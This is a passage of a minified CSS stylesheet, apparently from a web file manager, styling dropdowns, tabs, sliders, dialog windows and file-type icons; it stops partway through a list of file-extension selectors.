.select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,